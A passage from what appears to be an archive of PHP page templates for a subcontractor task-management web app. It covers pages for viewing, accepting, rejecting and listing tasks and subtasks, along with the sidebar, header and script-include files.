the array to a comma-separated string ?> <div id="datepicker"></div> <script> const today = new Date(); flatpickr("#datepicker", { enable: [<?php echo $jsDates; ?>], // Array of selectable dates dateFormat: "Y-m-d", // Date format inline: true, // Show calendar inline defaultDate: today, // Highlighted date disableMobile: "false" }); </script> </div> </div> </div> </div> </div> <div class="col-md-6"> <div class="card"> <div class="card-header"><h3>Subtasks</h3></div> <div class="card-body"> <!-- PHP code to fetch and display subtasks --> <?php // Fetch and display subtasks associated with the task $subtasks = $taskService->getSubtasksByTaskId($taskId); // Display subtasks if ($subtasks) { echo '<table class="table" id="advanced_table"> <thead> <tr> <th>Date</th> <th>Time</th> </tr> </thead> <tbody>'; foreach ($subtasks as $subtask) { echo '<tr> <td>' . $subtask->subtask_date . '</td> <td>' . ($subtask->subtask_time ? $subtask->subtask_time : "Not set") . '</td> </tr>'; } echo '</tbody></table>'; } else { echo '<p>No subtasks found for this task.</p>'; } ?> </div> </div> </div> </div> </div> </div> <script> console.log('Script block is running.'); var acceptTaskButton = document.getElementById('acceptTask'); if (acceptTaskButton) { acceptTaskButton.addEventListener('click', function() { console.log('Accept task button clicked.'); Swal.fire({ title: 'Are you sure?', text: "Do you want to accept this task?", icon: 'warning', showCancelButton: true, confirmButtonColor: '#3085d6', cancelButtonColor: '#d33', confirmButtonText: 'Yes, accept it!' }).then((result) => { if (result.isConfirmed) { var xhr = new XMLHttpRequest(); xhr.open('POST', 'accepttask.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { console.log(xhr.responseText); // Log the response if (xhr.responseText === 'success') { Swal.fire( 'Accepted!', 'Task accepted successfully.', 'success' ).then(() => { //navigates to view task window.location.href = 'viewtask.php?id=<?php echo $System->encryptData($taskId); ?>'; //window.location.reload(); }); } else if (xhr.responseText === 'error') { Swal.fire( 'Error!', 'An error occurred. Please try again.', 'error' ); } else if (xhr.responseText === 'task_not_found') { Swal.fire( 'Not Found!', 'Task not found.', 'warning' ); } else if (xhr.responseText === 'invalid_data') { Swal.fire( 'Invalid Data!', 'Invalid data.', 'warning' ); } else if (xhr.responseText === 'invalid_request') { Swal.fire( 'Invalid Request!', 'Invalid request.', 'warning' ); } } }; var taskId = '<?php echo htmlspecialchars($taskId); ?>'; var companyId = '<?php echo htmlspecialchars($currentCompanyId); ?>'; xhr.send('taskId=' + taskId + '&companyId=' + companyId); } }); }); } else { console.error('Accept task button not found.'); } // Reject task button var rejectTaskButton = document.getElementById('rejectTask'); if (rejectTaskButton) { rejectTaskButton.addEventListener('click', function() { console.log('Reject task button clicked.'); Swal.fire({ title: 'Are you sure?', text: "Do you want to reject this task?", icon: 'warning', showCancelButton: true, confirmButtonColor: '#d33', cancelButtonColor: '#3085d6', confirmButtonText: 'Yes, reject it!' }).then((result) => { if (result.isConfirmed) { var xhr = new XMLHttpRequest(); xhr.open('POST', 'rejecttask.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { console.log(xhr.responseText); // Log the response if (xhr.responseText === 'success') { Swal.fire( 'Rejected!', 'Task rejected successfully.', 'success' ).then(() => { //navigates to view task window.location.href = 'viewtasksassignedtome.php'; //window.location.reload(); }); } else if (xhr.responseText === 'error') { Swal.fire( 'Error!', 'An error occurred. Please try again.', 'error' ); } else if (xhr.responseText === 'task_not_found') { Swal.fire( 'Not Found!', 'Task not found.', 'warning' ); } else if (xhr.responseText === 'invalid_data') { Swal.fire( 'Invalid Data!', 'Invalid data.', 'warning' ); } else if (xhr.responseText === 'invalid_request') { Swal.fire( 'Invalid Request!', 'Invalid request.', 'warning' ); } } }; var taskId = '<?php echo htmlspecialchars($taskId); ?>'; var companyId = '<?php echo htmlspecialchars($currentCompanyId); ?>'; xhr.send('taskId=' + taskId + '&companyId=' + companyId); } }); }); } else { console.error('Reject task button not found.'); } </script> <?php include('footer.php'); ?> subcontractor/assigntasks.php000064400000014410151676701240012510 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; require_once '../../Service/ServiceService.php'; $serviceService = new ServiceService(); $System = new System(); $services = $serviceService->getAllServicesForDropdown(); // Create TaskService instance $taskService = new TaskService(); $tasks = $taskService->getTasksWithUnassignedSubtasks($companyId); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Assignable Tasks</h5> <span>View details of tasks assigned to your company</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">View Accepted Tasks</li> </ol> </nav> </div> </div> </div> <!-- Task viewing section --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"><h3>View Tasks</h3></div> <div class="card-body"> <div class="form-group row"> <div class="col-sm-3"> <label for="filter_service" class="col-form-label">Filter Service Name:</label> <input type="text" class="form-control" id="filter_service"> </div> <div class="col-sm-3"> <label for="filter_region" class="col-form-label">Filter Region:</label> <select class="form-control" id="filter_region"> <option value="">All Regions</option> <?php // Collect unique regions $uniqueRegions = []; foreach ($services as $service) { if (!in_array($service->region, $uniqueRegions)) { $uniqueRegions[] = $service->region; ?> <option value="<?= htmlspecialchars($service->region) ?>"><?= htmlspecialchars($service->region) ?></option> <?php } } ?> </select> </div> </div> <table id="super_advanced_table" class="table"> <thead> <tr> <th>ID</th> <th>Service Name</th> <th>Region</th> <th>Frequency</th> <th>Created At</th> <th>Completed</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($tasks as $task): ?> <tr> <td><?php echo 'TSK-000'.$task->id; ?></td> <td><?php echo $task->service_name; ?></td> <td><?php echo $task->region; ?></td> <td><?php echo $task->frequency; ?></td> <td><?php echo date('F j, Y, g:i a', strtotime($task->created_at)); ?></td> <td> <label class="badge badge-<?php echo $task->finished ? 'success' : 'yellow'; ?>"><?php echo $task->finished ? 'Completed' : 'Not Completed'; ?></label> </td> <td> <a href="viewtask.php?id=<?php echo $System->encryptData($task->id); ?>" class="btn btn-primary">View Details</a> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> <script> $(document).ready(function () { // Initialize DataTable var table = $('#super_advanced_table').DataTable({ // Configure initial settings if needed }); // Add custom filters $('#filter_service').on('keyup', function () { table.column(1).search(this.value).draw(); }); $('#filter_region').on('change', function () { table.column(2).search($(this).val()).draw(); }); }); </script> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> subcontractor/viewtask.php000064400000031236151676701240012020 0ustar00<?php include('head.php'); // Include database connection and TaskService class require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; $System = new System(); // Create TaskService instance $taskService = new TaskService(); // Check if task ID is provided in URL if (isset($_GET['id'])) { // Fetch task details based on ID $taskId = $System->decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$taskId) { echo '<script>Swal.fire({ title: "Invalid task ID!", text: "Please check the URL and try again.", icon: "error", confirmButtonText: "OK" }).then(function() { window.location = "viewAcceptedTasks.php"; });</script>'; } $task = $taskService->getTaskById($taskId); if (!$task) { exit(); } } else { echo '<p>No task ID provided.</p>'; } $subtasks = $taskService->getSubtasksByTaskId($taskId); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-box bg-blue"></i> <div class="d-inline"> <h5>View Task</h5> <span>View details of a task</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">View Task</li> </ol> </nav> </div> </div> </div> <!-- New row for buttons and actions --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <div class="card-header-left"> <a href="javascript:history.back()" class="btn btn-outline-primary">Back</a> </div> <div class="card-header-right"> </div> </div> </div> </div> </div> <!-- Modal to assign task to a company --> <div class="row"> <div class="col-xl-6 col-md-6"> <div class="card "> <div class="card-body"> <div class="row align-items-center mb-30"> <div class="col-md-6"> <table> <tbody> <tr> <td><i class="ik ik-layers icon-large"></i></td> <td><h3 class="mb-0 fw-700 text-black"><?php echo $task->service_name; ?> </h3> </td> </tr> <tr> <td><i class="ik ik-map-pin icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $task->region; ?> </h5></td> </tr> <tr> <td><i class="ik ik-calendar icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $task->schedule_name; ?> </h5> </td> </tr> <tr> <td><i class="ik ik-clock icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $task->frequency; ?> </h5> </td> </tr> <tr> <td><i class="ik ik-check-circle icon-large"></i></td> <td> <h2><?php echo($task->finished ? '<span class="badge badge-success">Task completed</span>' : '<span class="badge badge-danger">Not Completed</span>'); ?></h2> </td> </tr> <!-- is public or not--> <?php if($task->is_assigned == 1 && $task->assigned_to == $companyId) : ?> <tr> <td><i class="ik ik-user icon-large"></i></td> <td><h6><span class="badge badge-yellow"> This task is assigned to your company.</span> </h6></td> </tr> <?php endif; ?> </tbody> </table> <style> table { width: 100%; border-collapse: collapse; } td { padding: 10px 15px; vertical-align: middle; } .icon-large { font-size: 24px; color: #333; } .mb-0 { margin-bottom: 0; } .fw-700 { font-weight: 700; } .fw-500 { font-weight: 500; } .text-black { color: #000; } .badge-success { background-color: #28a745; color: #fff; padding: 5px 10px; border-radius: 5px; } .badge-danger { background-color: #dc3545; color: #fff; padding: 5px 10px; border-radius: 5px; } </style> </div> <div class="col-md-6"> <?php // Assuming $task->dates is a JSON string $datesJson = $task->dates; // Decode the JSON string to an array $datesArray = json_decode($datesJson, true); // Extract the dates and format them for JavaScript $formattedDates = array_map(function ($dateEntry) { return '"' . $dateEntry['date'] . '"'; }, $datesArray); $jsDates = implode(",", $formattedDates); // Convert the array to a comma-separated string ?> <div id="datepicker"></div> <script> const today = new Date(); flatpickr("#datepicker", { enable: [<?php echo $jsDates; ?>], // Array of selectable dates dateFormat: "Y-m-d", // Date format inline: true, // Show calendar inline defaultDate: today, // Highlighted date disableMobile: "false" }); </script> </div> </div> </div> </div> </div> <!-- Form to assign task to a company --> <div class="col-md-6"> <div class="card"> <div class="card-header"><h3>Subtasks</h3></div> <div class="card-body"> <!-- PHP code to fetch and display subtasks --> <?php // Fetch and display subtasks associated with the task // Display subtasks if ($subtasks) { ?> <table class="table" id="advanced_table"> <thead> <tr> <th>Id</th> <th>Date</th> <th>Updated At</th> <th>Assigned</th> <th>Completed</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($subtasks as $subtask) { ?> <tr> <td> ST-000<?php echo $subtask->id; ?></td> <td><?php echo $subtask->subtask_date; ?></td> <td><?php echo date('F j, Y, g:i a', strtotime($subtask->updated_at)); ?></td> <td><?php echo($subtask->assigned ? '<span class="badge badge-success">Assigned</span>' : '<span class="badge badge-danger">Not Assigned</span>'); ?></td> <td> <?php if ($subtask->ignored) { echo '<span class="badge badge-warning">Ignored</span>'; } else { echo $subtask->completed ? '<span class="badge badge-success">Completed</span>' : '<span class="badge badge-danger">Not Completed</span>'; } ?> </td> <td> <a href="viewsubtask.php?id=<?php echo $System->encryptData($subtask->id); ?>" class="btn btn-primary">View</a> </td> </tr> <?php } ?> </tbody> </table> <?php } ?> </div> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> subcontractor/scripts.php000064400000007306151676701240011653 0ustar00<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script> <script>window.jQuery || document.write('<script src="../../src/js/vendor/jquery-3.3.1.min.js"><\/script>')</script> <script src="../../node_modules/popper.js/dist/umd/popper.min.js"></script> <script src="../../node_modules/bootstrap/dist/js/bootstrap.min.js"></script> <script src="../../node_modules/perfect-scrollbar/dist/perfect-scrollbar.min.js"></script> <script src="../../node_modules/screenfull/dist/screenfull.js"></script> <script src="../../node_modules/flatpickr/dist/flatpickr.js"></script> <script src="../../node_modules/sweetalert2/dist/sweetalert2.all.min.js"></script> <script src="../../dist/js/theme.min.js"></script> <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script> <script>window.jQuery || document.write('<script src="../../src/js/vendor/jquery-3.3.1.min.js"><\/script>')</script> <script src="../../node_modules/popper.js/dist/umd/popper.min.js"></script> <script src="../../node_modules/datatables.net/js/jquery.dataTables.min.js"></script> <script src="../../node_modules/datatables.net-bs4/js/dataTables.bootstrap4.min.js"></script> <script src="../../node_modules/datatables.net-responsive/js/dataTables.responsive.min.js"></script> <script src="../../node_modules/datatables.net-responsive-bs4/js/responsive.bootstrap4.min.js"></script> <script src="../../node_modules/d3/dist/d3.min.js"></script> <script src="../../node_modules/c3/c3.min.js"></script> <script src="../../js/tables.js"></script> <script src="../../js/widgets.js"></script> <script src="../../js/charts.js"></script> <!-- jQuery --> <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script> <script src="../../node_modules/select2/dist/js/select2.min.js"></script> <script src="../../node_modules/bootstrap-tagsinput/dist/bootstrap-tagsinput.min.js"></script> <script src="../../node_modules/jquery.repeater/jquery.repeater.min.js"></script> <script src="../../node_modules/mohithg-switchery/dist/switchery.min.js"></script> <script src="../../js/form-advanced.js"></script> <!-- Google Analytics: change UA-XXXXX-X to be your site's ID. --> <script> (function(b,o,i,l,e,r){b.GoogleAnalyticsObject=l;b[l]||(b[l]= function(){(b[l].q=b[l].q||[]).push(arguments)});b[l].l=+new Date; e=o.createElement(i);r=o.getElementsByTagName(i)[0]; e.src='https://www.google-analytics.com/analytics.js'; r.parentNode.insertBefore(e,r)}(window,document,'script','ga')); ga('create','UA-XXXXX-X','auto');ga('send','pageview'); </script> <script> var scriptUrls = {}; var scripts = document.getElementsByTagName('script'); for (var i = 0; i < scripts.length; i++) { var src = scripts[i].src; if (src && !scriptUrls[src]) { scriptUrls[src] = true; } else { scripts[i].parentNode.removeChild(scripts[i]); } } </script> <script> $(document).ready(function() { $('.select2').select2(); }); </script> <link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.24/css/jquery.dataTables.css"> <script type="text/javascript" charset="utf8" src="https://code.jquery.com/jquery-3.5.1.js"></script> <script type="text/javascript" charset="utf8" src="https://cdn.datatables.net/1.10.24/js/jquery.dataTables.js"></script> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/js/bootstrap-datepicker.min.js"></script> <script src="../../node_modules/select2/dist/js/select2.min.js"></script> <script src="https://cdn.datatables.net/1.10.24/js/jquery.dataTables.min.js"></script> </body> </html> subcontractor/rejecttask.php000064400000002530151676701240012315 0ustar00<?php session_start(); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/Task.php'; if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (isset($_POST['taskId']) && isset($_POST['companyId'])) { $taskId = $_POST['taskId']; $companyId = $_POST['companyId']; $taskService = new TaskService(); $task = $taskService->getTaskByIdAsObject($taskId); if ($task) { $task->setAssignedTo(null); $task->setIsAssigned(0); // Get existing not accepted users $temp = $task->getNotAcceptedUsers(); $notAcceptedUsers = array_filter(explode(',', $temp)); // Add the new companyId if not already in the list if (!in_array($companyId, $notAcceptedUsers)) { $notAcceptedUsers[] = $companyId; } // Convert the array back to a string $task->setNotAcceptedUsers(implode(',', $notAcceptedUsers)); if ($taskService->rejectTask($task)) { echo 'success'; } else { echo 'error'; } } else { echo 'task_not_found'; } } else { echo 'invalid_data'; } } else { echo 'invalid_request'; } ?> subcontractor/sidebar.php000064400000006376151676701240011603 0ustar00<div class="app-sidebar colored"> <div class="sidebar-header"> <a class="header-brand" href="#"> <div class="logo-img"> </div> <img src="../../src/img/Emera-Primary-Logo-White.png" class="header-brand-img" alt="Emera Primary Logo" height="50px"> </a> <button id="sidebarClose" class="nav-close"><i class="ik ik-x"></i></button> </div> <div class="sidebar-content"> <div class="nav-container"> <nav id="main-menu-navigation" class="navigation-main"> <div class="nav-item"> <a href="dashboard.php"><i class="ik ik-bar-chart-2"></i><span>Dashboard</span></a> </div> <div class="nav-lavel">Tasks</div> <div class="nav-item"> <a href="viewpublictasks.php"><i class="ik ik-box"></i><span>Public Tasks</span></a> </div> <div class="nav-item"> <a href="viewtasksassignedtome.php"><i class="ik ik-corner-left-down"></i><span>View Unaccepted Tasks</span></a> </div> <div class="nav-item"> <a href="acceptedongoingtaks.php"><i class="ik ion-ios-keypad"></i><span>Accepted / Ongoing Tasks</span></a> </div> <div class="nav-item"> <a href="assigntasktoworkers.php"><i class="ik ik-check-circle"></i><span>Assign Sub Tasks</span></a> </div> <div class="nav-item"> <a href="viewassignedsubtasksdaywise.php"><i class="ik ik-check-circle"></i><span>View Subtasks</span></a> </div> <div class="nav-item"> <a href="viewAcceptedTasks.php"><i class="ik ik-clipboard"></i><span>All Tasks</span></a> </div> <div class="nav-lavel">Reports</div> <div class="nav-item"> <a href="reports.php"><i class="ik ik-pie-chart"></i><span>Reports</span></a> </div> <div class="nav-lavel">Logout</div> <div class="nav-item"> <a href="../logout.php" id="logout-link"><i class="ik ik-power"></i><span>Logout</span></a> </div> <script> document.getElementById('logout-link').addEventListener('click', function(event) { event.preventDefault(); // Prevent the default action Swal.fire({ title: 'Are you sure?', text: "You want to log out?", icon: 'warning', showCancelButton: true, confirmButtonColor: '#3085d6', cancelButtonColor: '#d33', confirmButtonText: 'Yes, log out!' }).then((result) => { if (result.isConfirmed) { window.location.href ='../logout.php'; } }); }); </script> </nav> </div> </div> </div>subcontractor/report_TaskSummaryForUser.php000064400000007216151676701240015345 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; // Create TaskService instance $taskService = new TaskService(); $userid = $_SESSION['user_id']; // Fetch task summaries for each user $taskSummaries = $taskService->getTaskSummaryForUser($userid); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>Task Summary for Each User</h5> <span>Summary of tasks for each user</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">Task Summary for Each User</li> </ol> </nav> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-body"> <div class="dt-responsive"> <table class="table" id="task_summary_table"> <thead> <tr> <th>User Name</th> <!-- <th>Assigned Tasks</th>--> <!-- <th>Pending Tasks</th>--> <th>Accepted Tasks</th> <th>Completed Tasks</th> <th>Incomplete Tasks</th> </tr> </thead> <tbody> <?php foreach ($taskSummaries as $summary) { ?> <tr> <td><?= htmlspecialchars($summary->user_name); ?></td> <!-- <td>--><?php //= htmlspecialchars($summary->assigned_tasks); ?><!--</td>--> <!-- <td>--><?php //= htmlspecialchars($summary->pending_tasks); ?><!--</td>--> <td><?= htmlspecialchars($summary->accepted_tasks); ?></td> <td><?= htmlspecialchars($summary->completed_tasks); ?></td> <td><?= htmlspecialchars($summary->not_completed_tasks); ?></td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> <script> $(document).ready(function() { $('#task_summary_table').DataTable(); }); </script> subcontractor/header.php000064400000016314151676701240011413 0ustar00<header class="header-top" header-theme="dark"> <div class="container-fluid"> <div class="d-flex justify-content-between"> <div class="top-menu d-flex align-items-center"> <button type="button" class="btn-icon mobile-nav-toggle d-lg-none"><span></span></button> <div class="header-search"> </div> <button type="button" id="navbar-fullscreen" class="nav-link"><i class="ik ik-maximize"></i></button> </div> <div class="top-menu d-flex align-items-center"> <!-- <div class="dropdown">--> <!--<!-- <a class="nav-link dropdown-toggle" href="#" id="notiDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><i class="ik ik-bell"></i><span class="badge bg-danger">3</span></a>-->--> <!-- <div class="dropdown-menu dropdown-menu-right notification-dropdown" aria-labelledby="notiDropdown">--> <!-- <h4 class="header">Notifications</h4>--> <!-- <div class="notifications-wrap">--> <!-- <a href="#" class="media">--> <!-- <span class="d-flex">--> <!-- <i class="ik ik-check"></i>--> <!-- </span>--> <!-- <span class="media-body">--> <!-- <span class="heading-font-family media-heading">Invitation accepted</span>--> <!-- <span class="media-content">Your have been Invited ...</span>--> <!-- </span>--> <!-- </a>--> <!-- <a href="#" class="media">--> <!-- <span class="d-flex">--> <!-- <img src="../../img/users/1.jpg" class="rounded-circle" alt="">--> <!-- </span>--> <!-- <span class="media-body">--> <!-- <span class="heading-font-family media-heading">Steve Smith</span>--> <!-- <span class="media-content">I slowly updated projects</span>--> <!-- </span>--> <!-- </a>--> <!-- <a href="#" class="media">--> <!-- <span class="d-flex">--> <!-- <i class="ik ik-calendar"></i>--> <!-- </span>--> <!-- <span class="media-body">--> <!-- <span class="heading-font-family media-heading">To Do</span>--> <!-- <span class="media-content">Meeting with Nathan on Friday 8 AM ...</span>--> <!-- </span>--> <!-- </a>--> <!-- </div>--> <!-- <div class="footer"><a href="javascript:void(0);">See all activity</a></div>--> <!-- </div>--> <!-- </div>--> <!-- <button type="button" class="nav-link ml-10 right-sidebar-toggle"><i class="ik ik-message-square"></i><span class="badge bg-success">3</span></button>--> <!-- <div class="dropdown">--> <!-- <a class="nav-link dropdown-toggle" href="#" id="menuDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><i class="ik ik-plus"></i></a>--> <!-- <div class="dropdown-menu dropdown-menu-right menu-grid" aria-labelledby="menuDropdown">--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Dashboard"><i class="ik ik-bar-chart-2"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Message"><i class="ik ik-mail"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Accounts"><i class="ik ik-users"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Sales"><i class="ik ik-shopping-cart"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Purchase"><i class="ik ik-briefcase"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Pages"><i class="ik ik-clipboard"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Chats"><i class="ik ik-message-square"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Contacts"><i class="ik ik-map-pin"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Blocks"><i class="ik ik-inbox"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Events"><i class="ik ik-calendar"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Notifications"><i class="ik ik-bell"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="More"><i class="ik ik-more-horizontal"></i></a>--> <!-- </div>--> <!-- </div>--> <!-- <button type="button" class="nav-link ml-10" id="apps_modal_btn" data-toggle="modal" data-target="#appsModal"><i class="ik ik-grid"></i></button>--> <!-- <div class="dropdown">--> <!-- <a class="dropdown-toggle" href="#" id="userDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><img class="avatar" src="../../img/user.jpg" alt=""></a>--> <!-- <div class="dropdown-menu dropdown-menu-right" aria-labelledby="userDropdown">--> <!-- <a class="dropdown-item" href="#"><i class="ik ik-user dropdown-icon"></i> Profile</a>--> <!-- <a class="dropdown-item" href="#"><i class="ik ik-settings dropdown-icon"></i> Settings</a>--> <!-- <a class="dropdown-item" href="#"><span class="float-right"><span class="badge badge-primary">6</span></span><i class="ik ik-mail dropdown-icon"></i> Inbox</a>--> <!-- <a class="dropdown-item" href="#"><i class="ik ik-navigation dropdown-icon"></i> Message</a>--> <!-- <a class="dropdown-item" href="#"><i class="ik ik-power dropdown-icon"></i> Logout</a>--> <!-- </div>--> <!-- </div>--> </div> </div> </div> </header>subcontractor/viewsubtasksdaywise.php000064400000027316151676701240014307 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; // Fetch assigned user ID from session or request $assignedUserId = $_SESSION['user_id'] ?? ($_GET['user_id'] ?? 1); // Default to 1 if not set // Create TaskService instance $taskService = new TaskService(); $System = new System(); // Assuming System class is correctly defined and used $SubContractorId = $_SESSION['user_id']; // Fetch all subtasks grouped by date $subtasks = $taskService->getAllSubtasksForSubContractorsGroupByDate($SubContractorId); ?> <!-- Include Bootstrap Datepicker CSS --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/css/bootstrap-datepicker.min.css" /> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>Tasks</h5> <span>Assign Tasks to Cleaner</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">All Subtasks</li> </ol> </nav> </div> </div> </div> <!-- Date Filter and Today Checkbox --> <div class="row mb-4"> <div class="col-md-3"> <div class="form-group"> <label for="startDate">Start Date</label> <input type="text" id="startDate" class="form-control datepicker" placeholder="Select start date"> </div> </div> <div class="col-md-3"> <div class="form-group"> <label for="endDate">End Date</label> <input type="text" id="endDate" class="form-control datepicker" placeholder="Select end date"> </div> </div> <div class="col-md-3 d-flex align-items-center"> <div class="form-check"> <input type="checkbox" class="form-check-input" id="filterToday"> <label class="form-check-label" for="filterToday">Today</label> </div> </div> <div class="col-md-3 d-flex align-items-center"> <button id="applyFilter" class="btn btn-primary">Apply Filter</button> </div> </div> <div class="row mb-4"> <div class="col-md-12"> <a href="assigntasktoworkers.php" class="btn btn-outline-success"><i class="ik ik-layers"></i> Regional View</a> </div> </div> <!-- Assign tasks to cleaner button--> <div class="row mb-4"> <div class="col-md-12"> <button class="btn btn-primary" id="assignTasks">Assign Tasks to Cleaner</button> </div> </div> <?php foreach ($subtasks as $date => $subtaskList) { ?> <div class="row subtask-row" data-date="<?php echo $date; ?>"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>Subtasks for <?php if ($date == date('Y-m-d')) { echo 'Today'; } else if ($date == date('Y-m-d', strtotime('tomorrow'))) { echo 'Tomorrow'; } else { echo date('l, F j, Y', strtotime($date)); } ?></h3> </div> <div class="card-body"> <div class="dt-responsive"> <table class="table" id="advanced_table_<?php echo strtotime($date); ?>"> <thead> <tr> <th>#</th> <th>ID</th> <th>Service Name</th> <th>Date</th> <th>Time</th> <th>Assigned</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($subtaskList as $subtask) { ?> <tr> <td> <input type="checkbox" class="select_all_child" id="selectall_<?php echo strtotime($date); ?>"> </td> <td>ST-000<?= $subtask['id']; ?></td> <td><?= $subtask['service_name']; ?></td> <td><?= $subtask['subtask_date']; ?></td> <td><?= $subtask['subtask_time'] ? date('h:i A', strtotime($subtask['subtask_time'])) : ''; ?></td> <td><?= $subtask['assigned'] ? '<span class="badge badge-success">Assigned</span>' : '<span class="badge badge-danger">Not Assigned</span>'; ?></td> <td> <a href="viewsubtask.php?id=<?= $System->encryptData($subtask['id']); ?>" class="btn btn-primary">View</a> </td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> </div> <?php } ?> </div> </div> <?php include('footer.php'); ?> <!-- Include jQuery and Bootstrap Datepicker JS --> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/js/bootstrap-datepicker.min.js"></script> <script> $(document).ready(function() { // Initialize datepickers $('.datepicker').datepicker({ format: 'yyyy-mm-dd', autoclose: true, todayHighlight: true }); // Filter subtasks by date and today checkbox function filterSubtasks() { var startDate = $('#startDate').val(); var endDate = $('#endDate').val(); var filterToday = $('#filterToday').prop('checked'); var today = new Date().toISOString().split('T')[0]; $('.subtask-row').each(function() { var subtaskDate = $(this).data('date'); var showRow = true; if (filterToday && subtaskDate !== today) { showRow = false; } else if ((startDate && subtaskDate < startDate) || (endDate && subtaskDate > endDate)) { showRow = false; } if (showRow) { $(this).show(); } else { $(this).hide(); } }); } // Event listeners for date filters and today checkbox $('#applyFilter').on('click', function() { filterSubtasks(); }); // Initialize DataTables for each table $('table').each(function() { $(this).DataTable(); }); // Handle select all checkboxes for each table $(".select-all").change(function() { var tableId = $(this).attr("id").replace("selectall_", ""); $("#" + tableId + " .select_all_child").prop('checked', $(this).prop("checked")); }); }); // Assign tasks to cleaner 